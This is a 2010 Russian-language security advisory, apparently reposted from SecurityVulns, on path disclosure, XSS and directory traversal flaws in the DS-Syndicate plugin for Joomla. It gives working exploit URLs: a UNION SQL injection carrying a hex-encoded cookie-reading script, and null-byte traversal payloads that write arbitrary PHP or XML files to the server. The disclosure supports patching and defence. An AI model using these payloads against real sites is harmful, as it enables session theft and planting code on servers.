New vulnerabilities in plugin DS-Syndicate for Joomla

2010-05-25T00:00:00
ID SECURITYVULNS:DOC:23911
Type securityvulns
Reporter Securityvulns
Modified 2010-05-25T00:00:00

Description

Здравствуйте 3APA3A!

Сообщаю вам о Full path disclosure, Cross-Site Scripting и Directory Traversal уязвимостях в плагине DS-Syndicate для Joomla.

Full path disclosure:

http://site/index2.php?option=ds-syndicate&version=1&feed_id=1%0A1

Хотя данная FPD имеет место в том же самом скрипте и том же самом параметре, но она выводит немного больше информации чем предыдущая FPD и проявляется не в одном, а сразу в двух скриптах. Т.е. её нужно исправлять отдельно.

XSS (через SQLi + FPD):

http://site/index2.php?option=ds-syndicate&version=1&feed_id=-1+union+select+1,1,1,1,1,0x3C7363726970743E616C65727428646F63756D656E742E636F6F6B6965293C2F7363726970743E,1,1,1,1,1,1,1,1,1,1,1,1,1,1%0A%23

При XSS (через SQLi) код не исполняется в браузере (потому что выводится xml), а при XSS (через SQLi + FPD) код исполняется в браузере (потому что выводится html). Только через SQL Injection нельзя провести XSS атаку, потому что код не исполняется в браузере, а при использовании вместе SQLi и FPD можно провести XSS атаку.

Directory Traversal:

Для записи любых файлов, в частности PHP скриптов, а также для перезаписи любых файлов на сервере (при отключенных magic quotes):

http://site/index2.php?option=ds-syndicate&version=1&feed_id=/../../../../1.php%00

Файл доступен: http://site/1.php

Для записи xml-файлов - для проведения XSS (через XML) и LFI атак, а также для перезаписи любых xml-файлов на сервере:

http://site/index2.php?option=ds-syndicate&version=1&feed_id=/../../../../1

Файл доступен: http://site/1.xml

Для записи PHP скриптов и других файлов, а также для проведения XSS и LFI атак нужно использовать один из параметров 2, 3, 6 или 18 SQL запроса.

http://site/index2.php?option=ds-syndicate&version=1&feed_id=-1+union+select+1,0x436F6465,0x436F6465,1,1,0x436F6465,1,1,1,1,1,1,1,1,1,1,1,0x436F6465,1,1%23/../../../../1

Уязвимы все версии DS-Syndicate для Joomla. Замечу, что разработчик плагина более его не поддерживает, поэтому пользователям плагина нужно исправить его самостоятельно.

О данных уязвимостях я упомянул у себя на сайте (http://websecurity.com.ua/4224/).

Best wishes & regards, MustLive Администратор сайта http://websecurity.com.ua